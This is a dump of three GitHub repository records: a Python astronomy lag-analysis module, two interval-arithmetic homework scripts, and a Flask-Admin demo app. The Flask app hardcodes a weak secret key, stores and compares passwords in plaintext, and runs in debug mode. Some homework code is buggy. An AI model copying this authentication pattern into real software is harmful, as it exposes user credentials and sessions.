str(a).split(\".\")[1]\n for i, num in enumerate(list(deci_str)):\n if num != '0':\n break\n return i+1\n\n low = float(round(low, 10))\n hig = float(round(hig, 10))\n # Get digit\n min_abs = abs(low) if abs(low) <= abs(hig) else abs(hig)\n if min_abs > 1:\n nd_max = 0\n else:\n dig_low = get_deci_nonzero(low)\n dig_hig = get_deci_nonzero(hig)\n nd_max = dig_low if dig_low >= dig_hig else dig_hig\n # Float into integer\n low_tmp = np.floor(low * 10 ** nd_max)\n hig_tmp = np.ceil(hig * 10 ** nd_max)\n binsize_tmp = binsize * 10 ** nd_max\n # Make bins\n bins = np.arange(low_tmp, hig_tmp + binsize_tmp, binsize_tmp)\n # Change digit into original\n bins = bins / 10 **nd_max\n return bins\n\n\nclass Summary:\n\n def __init__(self, df_sum, x_vec, freq_info):\n\n # summary\n self.df_sum = df_sum\n\n # freq\n self.freq_info = freq_info\n n_freq = int(freq_info[2])\n self.freq_list = self._make_freqlist(freq_info[0],\n freq_info[1],\n freq_info[2])\n self.freq_lo, self.freq_hi, self.n_freq = self.freq_info\n self.delta_freq = (self.freq_hi - self.freq_lo) / self.n_freq\n\n # x\n self.x = x_vec\n self.x1 = x_vec[:2 * n_freq]\n self.x2 = x_vec[ 2 * n_freq:]\n\n\n def __repr__(self):\n return repr(self.df_sum)\n\n def __add__(self, sum_add):\n\n # serch duplicated record\n id_add = []\n for i, freq_add in enumerate(sum_add.df_sum['freq'].values):\n for j, freq_ori in enumerate(self.df_sum['freq'].values):\n if freq_add == freq_ori:\n id_add.append(i)\n break\n id_rm = np.ones(len(sum_add.df_sum), dtype=bool)\n id_rm[id_add] = False\n\n # add\n df_sum_add = sum_add.df_sum[id_rm]\n df_sum_comb = pd.concat(\n [self.df_sum, df_sum_add]).sort_values('freq')\n return Summary(df_sum_comb.reset_index(drop=True),\n self.x, self.freq_info)\n\n def __sub__(self, sum_sub):\n # serch duplicated record\n id_sub = ~self.df_sum.freq.isin(sum_sub.df_sum.freq)\n return Summary(self.df_sum[id_sub].reset_index(drop=True),\\\n self.x, self.freq_info)\n\n def anti(self):\n df_sum_out = self.df_sum.copy()\n df_sum_out.loc[:,'lag'] = list(map(\n lambda lag, period: lag - period/2 if lag >= 0 else lag + period/2,\n df_sum_out['lag'],\n df_sum_out['period']))\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def unique(self):\n df_sum_original = make_summary(self.x, self.freq_info)\n freq_list= self.df_sum.loc[:,'freq'].values\n df_sum_out = df_sum_original\\\n [df_sum_original.freq.isin(freq_list)].reset_index(drop=True)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def threshold(self, threshold):\n df_sum_th = self.df_sum.copy()\n df_sum_th['ratio'] = list(map(\n lambda norm1, norm2: norm1/norm2\n if norm1 <= norm2 else norm2/norm1,\n df_sum_th['norm1'].values,\n df_sum_th['norm2'].values\n ))\n df_sum_th = df_sum_th.query('ratio > @threshold').copy()\\\n .reset_index(drop=True)\n df_sum_th.drop('ratio', axis=1, inplace=True)\n return Summary(df_sum_th, self.x, self.freq_info)\n\n def extract(self, ext_ranges):\n # serch\n id_list = []\n for j,lag in enumerate(self.df_sum['lag'].values):\n for ext_range in ext_ranges:\n if ext_range[0] <= lag < ext_range[1]:\n id_list.append(j)\n break\n # choice\n df_sum_out = self.df_sum.iloc[id_list,:].reset_index(drop=True)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def cut(self, cut_ranges):\n\n # serch\n id_add = []\n for j,lag in enumerate(self.df_sum['lag'].values):\n for cut_range in cut_ranges:\n if cut_range[0] <= lag < cut_range[1]:\n id_add.append(j)\n break\n # choice\n id_rm = np.ones(len(self.df_sum), dtype=bool)\n id_rm[id_add] = False\n df_sum_out = self.df_sum.iloc[id_rm,:].reset_index(drop=True)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n def make_periodicsum(self, lagrange):\n columns = self.df_sum.columns.values\n ndarray_sum = self.df_sum.values\n for para in list(ndarray_sum):\n (lag, norm12, norm1, norm2, period, freq) = para\n # plus\n i = 0\n lag_peri = lag\n while lagrange[0] < lag + (i*period) <= lagrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += 1\n # munus\n i = -1\n lag_peri = lag - period\n #while lag_peri > lagrange[0]:\n while lagrange[0] < lag + (i*period) <= lagrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += -1\n df_sum_out = pd.DataFrame(ndarray_sum, columns=columns)\n return Summary(df_sum_out, self.x, self.freq_info)\n\n\n def pred(self, t1, t2):\n # extract x from sum\n x1_out = self._make_x(self.x1, self.df_sum, self.freq_list)\n x2_out = self._make_x(self.x2, self.df_sum, self.freq_list)\n\n # make y\n A1 = self._make_matrix_dft(t1, self.freq_list)\n A2 = self._make_matrix_dft(t2, self.freq_list)\n x1 = self._make_x(x1_out, self.df_sum, self.freq_list)\n x2 = self._make_x(x2_out, self.df_sum, self.freq_list)\n y1 = np.dot(A1, x1)\n y2 = np.dot(A2, x2)\n\n return y1, y2\n\n def psd(self):\n\n # extract x from sum\n x1_out = self._make_x(self.x1, self.df_sum, self.freq_list)\n x2_out = self._make_x(self.x2, self.df_sum, self.freq_list)\n\n n_freq = self.freq_info[2]\n power1_vec = list(map(\n lambda a, b: np.sqrt(a**2+b**2),\n x1_out[n_freq:],\n x1_out[:n_freq]\n ))\n power2_vec = list(map(\n lambda a, b: np.sqrt(a**2+b**2),\n x2_out[n_freq:],\n x2_out[:n_freq]\n ))\n\n return np.array(power1_vec), np.array(power2_vec)\n\n def resfunc(self, t):\n # extract x from sum\n x1_out = self._make_x(self.x1, self.df_sum, self.freq_list)\n x2_out = self._make_x(self.x2, self.df_sum, self.freq_list)\n x_out = np.hstack([x1_out, x2_out])\n\n # make x of resfunc\n n_freq = self.freq_info[2]\n a = x_out[0 * n_freq : 1 * n_freq]\n b = x_out[1 * n_freq : 2 * n_freq]\n c = x_out[2 * n_freq : 3 * n_freq]\n d = x_out[3 * n_freq : 4 * n_freq]\n delta_f = self.freq_list[1] - self.freq_list[0]\n x_res_real = np.array(list(map(\n lambda a,b,c,d:(a*c+b*d)/(b**2+a**2)/(2*delta_f)\\\n if a != b else 0,\n a, b, c, d)))\n x_res_imag = np.array(list(map(\n lambda a,b,c,d:(a*d-b*c)/(b**2+a**2)/(2*delta_f)\\\n if a != b else 0,\n a, b, c, d)))\n x_res = np.hstack([x_res_real, x_res_imag])\n\n # make y\n A = self._make_matrix_dft(t, self.freq_list)\n y = np.dot(A, x_res)\n return y\n\n def hist(self, lagbins, density=True):\n df_sum_pow = self.df_sum.copy()\n hist_value = pd.cut(df_sum_pow.lag.values, bins=lagbins)\\\n .value_counts().sort_index().values\n if density:\n hist_value = hist_value / len(self.df_sum)\n bins_center = (lagbins[:-1] + lagbins[1:]) / 2\n return bins_center, hist_value\n\n def powerhist(self, lagbins, density=True):\n df_sum_pow = self.df_sum.copy()\n df_sum_pow['id_bins'] = pd.cut(df_sum_pow.lag.values,\n bins=lagbins)\n powerhist_value = df_sum_pow.groupby('id_bins')['norm12']\\\n .sum().values\n if density:\n powerhist_value = powerhist_value / df_sum_pow.norm12.sum()\n bins_center = (lagbins[:-1] + lagbins[1:]) / 2\n return bins_center, powerhist_value\n\n\n def plot_cbplot(self, threshold=None, lagrange=None, ax=None):\n\n import matplotlib.cm as cm\n if ax == None:\n fig, ax = plt.subplots()\n # color babble plot\n size = list(map(\n lambda norm1, norm2: norm1/norm2 if norm1 <= norm2\n else norm2/norm1,\n self.df_sum.norm1.values,\n self.df_sum.norm2.values))\n size_log = np.log10(1 + np.array(size)) * 750\n im = ax.scatter(self.df_sum['lag'].values,\n self.df_sum['norm12'].values,\n c=self.df_sum['freq'].values, cmap=cm.jet,\n alpha=0.8, s=size_log,\n norm=Normalize(self.freq_info[0],\n self.freq_info[1]))\n ax.set_yscale('log')\n ax.set_ylim(np.min(self.df_sum.norm12))\n ax.set_ylabel('Amplitude')\n ax.set_xlabel('Lag')\n if lagrange:\n ax.set_xlim(lagrange)\n\n # colorbat setting\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes(\"top\", size=\"7%\", pad=\"2%\")\n plt.colorbar(im, cax=cax, orientation='horizontal')\n cax.xaxis.set_ticks_position(\"top\")\n cax.xaxis.set_label_text(\"Frequency\")\n cax.xaxis.set_label_position(\"top\")\n\n return ax\n\n def plot_omplot(self, lagrange=None, lagbinwidth=None,\n lag_mode='standard', ci_list=None, ci_label=None):\n ''' plot omplot which is combined with color babble plot and\n histgram and poer histgram\n\n ci_list: (lag, ci_value)\n ci_label: ci name e.g. 'ci 95%'\n '''\n fig = plt.figure(figsize=(8, 2*2+3))\n height = 0.8/2\n\n # periodic sum\n if lag_mode == 'periodic':\n summ_peri = self.make_periodicsum(lagrange=lagrange)\n self.df_sum = summ_peri.df_sum\n\n # get hist value\n ax0 = fig.add_axes([0.10, 0.1+0*height, 0.85, height-0.2])\n if lagrange == None:\n lag_min = self.df_sum.lag.min()\n lag_max = self.df_sum.lag.max()\n else:\n lag_min = lagrange[0]\n lag_max = lagrange[1]\n if lagbinwidth == None:\n lagbinwidth = (lag_max - lag_min) / 20\n lagbins = set_bins(lag_min, lag_max, lagbinwidth)\n\n # hist and power hist\n bins_center, hist_value = self.hist(lagbins)\n bins_center, phist_value = self.powerhist(lagbins)\n ax0.bar(bins_center, hist_value, color=\"r\", width=lagbinwidth,\n align=\"center\", alpha=0.5, edgecolor=\"k\", label=\"Number\")\n ax0.bar(bins_center, phist_value, color=\"b\", width=lagbinwidth,\n align=\"center\", alpha=0.5, edgecolor=\"k\", label=\"Amplitude\")\n if ci_list:\n ax0.plot(ci_list[0], ci_list[1], label=ci_label,\n color='r', alpha=0.7)\n ax0.set_ylabel('Density')\n ax0.set_xlabel(r'$\\tau$ (s)')\n # ax0.set_xlabel('Lag')\n # ax0.legend(loc='best')\n\n # color babble plot\n ax1 = fig.add_axes([0.10, 0.1+1*height-0.2, 0.85, height+0.2],\n sharex=ax0)\n ax1 = self.plot_cbplot(ax=ax1, lagrange=lagrange)\n ax1.set_xlabel(None)\n plt.setp(ax1.get_xticklabels(), visible=False)\n\n return fig\n\n def _make_freqlist(self, freq_lo, freq_hi, n_freq):\n delta_freq = (freq_hi - freq_lo) / n_freq\n freq_list = np.round(\n np.linspace(\n freq_lo + delta_freq,\n freq_hi,\n n_freq) - delta_freq / 2, 10)\n return freq_list\n\n def _make_matrix_dft(self, t_list, freq_list):\n '''\n make matrix from time and freq\n '''\n delta_freq = freq_list[1] - freq_list[0]\n matrix_phase = 2 * np.pi * np.dot(\n np.array([t_list]).T, np.array([freq_list]))\n matrix_cos = 2 * delta_freq * np.cos(matrix_phase)\n matrix_sin = 2 * delta_freq * np.sin(matrix_phase)\n matrix = np.hstack([matrix_cos, matrix_sin])\n return matrix\n\n\n def _make_x(self, x_vec, df_sum, freq_list):\n \"\"\"make x vector from df_sum\n Return\n x_out: arraylike\n x vector wchich is calcurated by component whare demand lag\n \"\"\"\n # x\n x_vec = np.array(x_vec)\n #\n flg_list = np.zeros(len(freq_list))\n for sum_freq in df_sum['freq'].values:\n rep_sum_freq = np.repeat(np.round(sum_freq,10),\n len(freq_list))\n flg_list_tmp = np.array(list(map(\n lambda x_freq, sum_freq: 1 if x_freq == sum_freq else 0,\n freq_list,\n rep_sum_freq)))\n flg_list += flg_list_tmp\n flg_list = np.tile(flg_list, 2)\n x_out = x_vec * flg_list\n\n return x_out\n\nclass SummaryNew(Summary):\n\n def __init__(self, x_vec, freq_info):\n\n # summary\n self.df_sum = make_summary(x_vec, freq_info)\n\n # freq\n self.freq_info = freq_info\n n_freq = int(freq_info[2])\n self.freq_list = self._make_freqlist(freq_info[0],\n freq_info[1],\n freq_info[2])\n self.freq_lo, self.freq_hi, self.n_freq = self.freq_info\n self.delta_freq = (self.freq_hi - self.freq_lo) / self.n_freq\n\n # x\n self.x = x_vec\n self.x1 = x_vec[:2 * n_freq]\n self.x2 = x_vec[ 2 * n_freq:]\n\nif __name__ == \"__main__\":\n\n # summ = read_summary('example/out/sum.dat',\n # 'example/out/x.dat', (0,10,2000))\n summ = read_summary('example2/out/sum.dat', 'example2/out/x.dat',\n [0,0.5,200])\n freq_list = summ.freq_list\n\n # summ = summ.ext_from_sum([[0.1,0.3]])\n\n summ1 = summ.extract([[4,9]])\n summ2 = summ.extract([[6,9]])\n print(summ1)\n print(summ2)\n print(summ1 - summ2)\n\n # get value\n t_list = np.linspace(0, 100, 1000)\n y1, y2 = summ.pred(t_list, t_list)\n p1, p2 = summ.psd()\n\n # resfunc\n # t_res = np.linspace(-5,5,100)\n # y_res = summ.resfunc(t_res)\n # plt.plot(t_res, y_res)\n # plt.show()\n\n # # psd\n # fig, ax = plt.subplots(2,1)\n # ax[0].plot(freq_list, p1)\n # ax[1].plot(freq_list, p2)\n # plt.show()\n\n # pred\n data_lc1 = np.loadtxt('example2/data/lc1.dat')\n data_lc2 = np.loadtxt('example2/data/lc2.dat')\n t1 = data_lc1[:,0]\n f1 = data_lc1[:,1]\n t2 = data_lc2[:,0]\n f2 = data_lc2[:,1]\n fig, ax = plt.subplots(2,1, sharex=True)\n ax[0].plot(t1, f1, alpha=0.7, label='Obs')\n ax[0].plot(t_list, y1, alpha=0.7, label='Model')\n ax[0].set_ylabel('X-ray')\n ax[0].set_xlabel('Time')\n ax[0].legend(loc='best')\n ax[1].plot(t2, f2, alpha=0.7)\n ax[1].plot(t_list, y2, alpha=0.7)\n ax[1].set_ylabel('Optical')\n ax[1].set_xlabel('Time')\n plt.subplots_adjust(hspace=0)\n plt.show()\n\n # omplot\n summ.plot_omplot(lagbinwidth=1)\n plt.show()\n"
}
] | 21 |
KanishkaKatipearachchi/Logarithm | https://github.com/KanishkaKatipearachchi/Logarithm | b3aaa678b0fc39d9208c1b6b0eb1d6267b43da6d | ac43a5782e8c230d530a37bb171c6ef71f421cec | 89c6a956909e76c609f53234907f6b169332eb2b | refs/heads/master | 2020-09-21T06:37:51.102126 | 2019-12-17T06:40:58 | 2019-12-17T06:40:58 | 224,711,954 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5440547466278076,
"alphanum_fraction": 0.5590248107910156,
"avg_line_length": 27.487804412841797,
"blob_id": "b303fdb03f0dfc7a6b3e9e89efafa9d98c54f1b3",
"content_id": "eb172272a7fb3533c5cae5a095a993113e4fba22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4676,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 164,
"path": "/interval.py",
"repo_name": "KanishkaKatipearachchi/Logarithm",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Interval():\n \"\"\"\n A class representing a closed interval of real numbers.\n This class can undergo arithmetic operations with other intervals,\n and of real numbers, where a real number n is represented as [n, n].\n \"\"\"\n def __init__(self, *args):\n \"\"\"\n Initializes an interval\n Given one numeric parameter\n \"\"\"\n left = args[0]\n if len(args) > 1:\n right = args[1]\n else:\n right = args[0]\n if not is_number(left) or not is_number(right):\n raise ValueError(\"arguments must be numbers\")\n if left <= right:\n self.left = left\n self.right = right\n else:\n self.right = left\n self.left = right\n\n def __add__(self, other):\n \"\"\"\n Adds this interval to another interval\n \"\"\"\n other = as_interval(other)\n return Interval(self.left + other.left, self.right + other.right)\n\n def __radd__(self, other):\n \"\"\"\n The reverse order of the add method\n Addition of intervals is commutative\n \"\"\"\n return self + other\n\n def __sub__(self, other):\n \"\"\"\n Subtracts another interval from this interval\n \"\"\"\n other = as_interval(other)\n return Interval(self.left - other.right, self.right - other.left)\n \n def __rsub__(self, other):\n \"\"\"\n Subtracts this interval from another interval\n \"\"\"\n return as_interval(other) - self\n\n def __mul__(self, other):\n \"\"\"\n Multiplies this interval with another interval\n \"\"\"\n other = as_interval(other)\n combinations = [self.left * other.left, self.left * other.right, self.right * other.left, self.right * other.right]\n return Interval(min(combinations), max(combinations))\n\n def __rmul__(self, other):\n \"\"\"\n Multiplies another interval with this interval\n Multiplication commutes\n \"\"\"\n return self * other\n\n def __div__(self, other):\n \"\"\"\n Divides this interval by another interval\n \"\"\"\n other = as_interval(other)\n combinations = [self.left / other.left, self.left / other.right, self.right / other.left, self.right / other.right]\n return Interval(min(combinations), max(combinations))\n\n def __pow__(self, power):\n \"\"\"\n Takes this interval to an integer power\n \"\"\"\n if type(power) != int:\n raise ValueError(\"power must be an integer\")\n if power % 2 == 0:\n if self.left >= 0:\n return Interval(self.left**power, self.right**power)\n elif self.right < 0:\n return Interval(self.right**power, self.left**power)\n else:\n return Interval(0, max([self.right**power, self.left**power]))\n return Interval(self.left**power, self.right**power)\n\n def __contains__(self, item):\n return item >= self.left and item <= self.right\n\n def __str__(self):\n return \"[%s, %s]\" % (self.left, self.right)\n\ndef as_interval(x):\n \"\"\"\n Returns x, inputted as either a number or an interval, as an interval.\n If x is an interval the function returns just x. \n \"\"\"\n if isinstance(x, Interval):\n return x\n return Interval(x)\n\ndef p(i):\n \"\"\"\n The interval polynomial defined in the problem description.\n Returns an interval resulting from the interval parameter.\n \"\"\"\n return 3 * i**3 - 2 * i**2 - 5 * i - 1\n\ndef is_number(x):\n \"\"\"\n Given a data value, returns True if it is of type float or int, False otherwise.\n \"\"\"\n return isinstance(x, int) or isinstance(x, float)\n\n\ndef main():\n \"\"\"\n Main function;\n For testing and demonstrative purposes.\n \"\"\"\n i1 = Interval(1, 4)\n print(i1)\n i2 = Interval(-2, -1)\n print(i2)\n print(i1 + i2)\n print(i1 - i2)\n print(i1 * i2)\n print(i1 / i2)\n print(Interval(2, 3) + 1)\n print(1 + Interval(2, 3))\n print(Interval(2, 3) - 1)\n print(1 - Interval(2, 3))\n print(Interval(2, 3) * 1)\n print(1 * Interval(2, 3))\n x = Interval(-2, 2)\n print(x**2)\n print(x**3)\n\n x = np.linspace(0.0, 1, 1000)\n\n y_intervals = [p(Interval(x[i], x[i] + 0.5)) for i in range(len(x))]\n y_lower = [i.left for i in y_intervals]\n y_upper = [i.right for i in y_intervals]\n\n plt.xlabel(\"x\")\n plt.ylabel(\"p(I)\")\n\n plt.title(\"$p(I) = 3I^3 - 2I^2 - 5I - 1$, I = Interval(x, x + 0.5)\")\n\n plt.plot(x, y_lower)\n plt.plot(x, y_upper)\n plt.savefig(\"interval.png\")\n \n\nif __name__ == \"__main__\":\n main()\n "
},
{
"alpha_fraction": 0.5482901930809021,
"alphanum_fraction": 0.5674676299095154,
"avg_line_length": 36.35652160644531,
"blob_id": "2903ad1e618ad8bee65209787f3fb337874c816d",
"content_id": "b656338ea611a770e9d6cf93bb55c0be7324b14b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4328,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 115,
"path": "/Homework_2.py",
"repo_name": "KanishkaKatipearachchi/Logarithm",
"src_encoding": "UTF-8",
"text": "class Interval:\n \n def __init__( self, left_endpoint, right_endpoint= None ) :\n if right_endpoint==None:\n right_endpoint = left_endpoint\n else:\n pass\n if isinstance( left_endpoint, int) and isinstance( right_endpoint, int) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n \n elif isinstance( left_endpoint, float) and isinstance( right_endpoint, int) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n \n elif isinstance( left_endpoint, int) and isinstance( right_endpoint, float) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n \n elif isinstance( left_endpoint, float) and isinstance( right_endpoint, float) :\n self.left_endpoint = left_endpoint\n self.right_endpoint = right_endpoint\n else:\n raise TypeError(\"left and right intervals must be real numbers\")\n \n \n def __add__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n return Interval( l1 + l2, r1 + r2)\n \n def __sub__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n return Interval( l1 - r2, r1 - l2)\n\n def __mul__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n L=[l1*l2, l1*r2, r1*l2, r1*r2]\n return Interval( min(L), max(L)) \n \n def __truediv__( self, other):\n l1, r1 = self.left_endpoint, self.right_endpoint\n if isinstance( other, Interval) :\n if other.left_endpoint == 0 or other.right_endpoint == 0:\n raise ZeroDivisionError(\"Neither endpoint can be 0\")\n else:\n l2, r2 = other.left_endpoint, other.right_endpoint\n elif isinstance( other, float) or isinstance( other, int):\n if other == 0:\n raise ZeroDivisionError(\"Cannot be zero\")\n else:\n l2, r2 = other, other\n else: \n raise TypeError(\"Must be Intervals\")\n L=[l1/l2, l1/r2, r1/l2, r1/r2]\n return Interval( min(L), max(L))\n \n def __repr__(self):\n return f\"({self.left_endpoint}, {self.right_endpoint})\"\n \n def __contains__( self, number):\n if not isinstance( number, float) and not isinstance( number, int):\n raise TypeError(\"Must give us a real number\")\n else:\n return number >= self.left_endpoint and number <= self.right_endpoint\n \n def __radd__(self, other):\n return self + other\n \n def __rsub__(self, other):\n return self - other\n \n def __rmul__(self, other):\n return self*other\n \n def __pow__(self, other):\n interval = self\n if self.left_endpoint >= 0:\n return Interval(self.left_endpoint**other, self.right_endpoint**other)\n elif self.right_endpoint<0:\n return Interval(self.right_endpoint**other, self.left_endpoint**other)\n else:\n L=[0,max[self.left_endpoint**other, self.right_endpoint**other]]\n return interval\n \nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx1=np.linspace(0., 1, 1000)\nxu=np.linspace(0., 1, 1000)+ 0.5\nl=[]\nu=[]\nfor i in range(len(x1)):\n I=Interval(x1[i], xu[i])\n I1=3*I**3-2*I**2-5*I-1\n l.append(I1.left_endpoint)\n u.append(I1.right_endpoint)\nplt.plot(x1,u, x1,l)\n\n\n \n \n "
}
] | 2 |
reciproco/flask-admin-custom | https://github.com/reciproco/flask-admin-custom | 3ecdf160164050266576d5dc366d3e49d52b2cc7 | 79cb22aff9bd4a85667aae396e932383557a71a8 | 2bf1c8cd8e61593251421cd44134e3fbfa4f96a7 | refs/heads/master | 2021-01-19T08:55:06.308326 | 2015-11-30T10:31:41 | 2015-11-30T10:31:41 | 47,061,834 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5756457448005676,
"alphanum_fraction": 0.7749077677726746,
"avg_line_length": 26.100000381469727,
"blob_id": "78b4e27d57e053eb094c5ee4795a2ebf2ce88cb8",
"content_id": "6461e0282e492a91c9908f747f6d35bc5e31253d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 10,
"path": "/requirements.txt",
"repo_name": "reciproco/flask-admin-custom",
"src_encoding": "UTF-8",
"text": "Flask==0.10.1\n-e git+https://github.com/flask-admin/flask-admin.git@b90bda6055d2915306921d73c0e87ae3cfd7b280#egg=Flask_Admin-master\nFlask-Login==0.3.2\nFlask-SQLAlchemy==2.1\nJinja2==2.8\nMarkupSafe==0.23\nSQLAlchemy==1.0.9\nWTForms==2.0.2\nWerkzeug==0.11.2\nitsdangerous==0.24\n"
},
{
"alpha_fraction": 0.602042555809021,
"alphanum_fraction": 0.6108707189559937,
"avg_line_length": 27.885000228881836,
"blob_id": "bbae377a4ac0e4554dce73cc6ec0c45b47263d56",
"content_id": "ff837807397e778ce29a86d5d7ef3a1611cdff72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5777,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 200,
"path": "/app.py",
"repo_name": "reciproco/flask-admin-custom",
"src_encoding": "UTF-8",
"text": "from flask import Flask,url_for, redirect, render_template, request\nfrom wtforms import form, fields, validators\nimport flask_login as login\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func\nimport flask_admin as admin\nfrom flask_admin.contrib import sqla\nfrom flask_admin import helpers, expose\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\n\nCOMERCIAL = 1\n# Create application\napp = Flask(__name__)\n\n\n# Create dummy secrey key so we can use sessions\napp.config['SECRET_KEY'] = '123456790'\n\n# Create in-memory database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sample_db_2.sqlite'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\n\n# Flask views\[email protected]('/')\ndef index():\n return '<a href=\"/admin/\">Click me to get to Admin!</a>'\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n login = db.Column(db.String(80), unique=True)\n password = db.Column(db.String(64))\n\n # Flask-Login integration\n def is_authenticated(self):\n return True\n\n def is_active(self):\n return True\n\n def is_anonymous(self):\n return False\n\n def get_id(self):\n return self.id\n\n # Required for administrative interface\n def __unicode__(self):\n return self.username\n\n# Define login and registration forms (for flask-login)\nclass LoginForm(form.Form):\n login = fields.TextField(validators=[validators.required()])\n password = fields.PasswordField(validators=[validators.required()])\n\n def validate_login(self, field):\n user = self.get_user()\n\n if user is None:\n raise validators.ValidationError('Invalid user')\n\n #if not check_password_hash(user.password, self.password.data):\n if user.password != self.password.data:\n raise validators.ValidationError('Invalid password')\n\n def get_user(self):\n return db.session.query(User).filter_by(login=self.login.data).first()\n\n# Initialize flask-login\ndef init_login():\n login_manager = login.LoginManager()\n login_manager.init_app(app)\n\n # Create user loader function\n @login_manager.user_loader\n def load_user(user_id):\n return db.session.query(User).get(user_id)\n\nclass Car(db.Model):\n __tablename__ = 'cars'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n desc = db.Column(db.String(50))\n model = db.Column(db.String(50))\n brand = db.Column(db.String(50))\n hidden = db.Column(db.String(50))\n\n def __unicode__(self):\n return self.desc\n\n\n\nclass CarAdmin(sqla.ModelView):\n column_display_pk = True\n form_columns = ['model','brand', 'desc']\n column_searchable_list = ['model', 'brand','desc']\n can_delete = False\n can_create = False\n can_export = True\n\n\n\n def get_query(self):\n return self.session.query(self.model).filter(self.model.hidden==login.current_user.login)\n\n def get_count_query(self):\n return self.session.query(func.count('*')).filter(self.model.hidden == login.current_user.login)\n def is_accessible(self):\n return login.current_user.is_authenticated\n\n# Create customized index view class that handles login & registration\nclass MyAdminIndexView(admin.AdminIndexView):\n\n @expose('/')\n def index(self):\n if not login.current_user.is_authenticated:\n return redirect(url_for('.login_view'))\n return super(MyAdminIndexView, self).index()\n\n @expose('/login/', methods=('GET', 'POST'))\n def login_view(self):\n # handle user login\n form = LoginForm(request.form)\n if helpers.validate_form_on_submit(form):\n user = form.get_user()\n login.login_user(user)\n\n if login.current_user.is_authenticated:\n return redirect(url_for('.index'))\n self._template_args['form'] = form\n return super(MyAdminIndexView, self).index()\n\n @expose('/logout/')\n def logout_view(self):\n login.logout_user()\n return redirect(url_for('.index'))\n\ninit_login()\n\n# Create admin\nadmin = admin.Admin(app, name='Example: SQLAlchemy2',index_view=MyAdminIndexView(), base_template='my_master.html', template_mode='bootstrap3')\nadmin.add_view(CarAdmin(Car, db.session))\n\ndef build_sample_db():\n \"\"\"\n Populate a small db with some example entries.\n \"\"\"\n\n import random\n import datetime\n\n db.drop_all()\n db.create_all()\n\n # Create sample Users\n desc = [\n 'A', 'B', 'C', 'E', 'I', 'C', 'S', 'M',\n 'J', 'T', 'E', 'A', 'A', 'I', 'A', 'O', 'J',\n 'A', 'W', 'J', 'G', 'L', 'B', 'S', 'L'\n ]\n model = [\n 'Brown', 'Smith', 'Patel', 'Jones', 'Williams', 'Johnson', 'Taylor', 'Thomas',\n 'Roberts', 'Khan', 'Lewis', 'Jackson', 'Clarke', 'James', 'Phillips', 'Wilson',\n 'Ali', 'Mason', 'Mitchell', 'Rose', 'Davis', 'Davies', 'Rodriguez', 'Cox', 'Alexander'\n ]\n brand = [\n 'seat', 'citroen', 'renault', 'dig', 'juan', 'cpu', 'pol', 'Tas',\n 'nissan', 'hyundai', 'mercedes', 'Jdodge', 'manolo', 'it', 'Pips', 'Wi',\n 'wolswagen', 'skoda', 'bmw', 'Rose', 'pepe', 'ram', 'Roez', 'Cx', 'Al'\n ]\n hidden = [\n '1', '1', '1', '1', '1', '1', '1', '1',\n '2', '2', '2', '2', '2', '2', '3', '3',\n '3', '3', '3', '3', '3', '3', '3', '3', '3'\n ]\n\n car_list = []\n for i in range(len(desc)):\n car = Car()\n car.desc = desc[i]\n car.brand = brand[i].lower()\n car.hidden = hidden[i]\n car.model = model[i]\n car_list.append(car)\n db.session.add(car)\n\n user = User()\n user.login = '2'\n user.password = '1234'\n db.session.add(user)\n\n db.session.commit()\n\nif __name__ == '__main__':\n\n # Create DB\n build_sample_db()\n\n # Start app\n app.run(debug=True)\n"
}
] | 2 |
